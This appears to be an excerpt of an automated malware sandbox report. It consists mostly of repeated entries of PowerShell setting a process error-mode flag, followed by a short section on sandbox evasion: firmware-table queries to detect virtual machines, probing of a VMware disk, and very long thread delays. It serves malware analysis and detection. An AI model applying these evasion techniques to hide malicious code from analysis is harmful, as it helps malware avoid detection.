        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Query firmware table information (likely to detect VMs)
        Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformation
        Source: C:\Windows\explorer.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
